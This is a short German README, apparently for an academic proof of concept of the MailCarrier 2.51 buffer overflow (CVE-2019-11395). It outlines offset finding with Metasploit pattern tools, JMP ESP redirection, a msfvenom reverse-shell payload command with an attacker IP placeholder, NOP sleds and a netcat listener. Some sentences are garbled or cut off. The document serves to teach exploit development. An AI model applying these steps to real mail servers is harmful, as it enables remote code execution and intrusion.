
Proof of Concept zu akademischen Zwecken, um die Buffer-Overflow-Schwachstelle anhand von CVE-2019-11395 zu verstehen.
Dieses Proof of Concept (PoC) demonstriert eine Pufferüberlauf-Schwachstelle in MailCarrier 2.51, die es entfernten Angreifern ermöglicht, über eine lange Zeichenfolge beliebigen Code auszuführen. Die Schwachstelle kann über die folgenden Prozesse ausgenutzt werden:
SMTP RCPT TOPOP3 USERPOP3 LISTPOP3 TOPPOP3 RETRDas Projekt zielt darauf ab, einen akademischen Ansatz zum Verständnis der Funktionsweise von Pufferüberläufen zu bieten.
Bevor Sie Tests durchführen, verwenden Sie niemals Ihre Produktionsumgebung für erste Experimente. Erstellen Sie stattdessen ein Lab-Setup, das Ihrer Produktionsumgebung ähnelt, um Probleme oder unbeabsichtigte Folgen zu vermeiden.
msf-pattern_create -l <number_of_bytes>
Dies hilft, den Offset zu bestimmen, also die genaue Anzahl an Bytes, die benötigt wird, um das EIP zu überschreiben.
msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
Dies identifiziert die genaue Byte-Anzahl, die erforderlich ist, um das EIP zu kontrollieren.
JMP ESP
CALL ESP
Wir verwenden diese Adresse, um die Ausführung umzuleiten. Seien Sie vorsichtig mit ASLR, SafeSEH oder anderen Schutzmechanismen.
msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
NOP-Anweisungen (\x90) in den Payload ein, um die Stabilität zu verbessern.netcat (nc), um eine Reverse Shell zu erstellen und eine Verbindung zum Ziel herzustellen.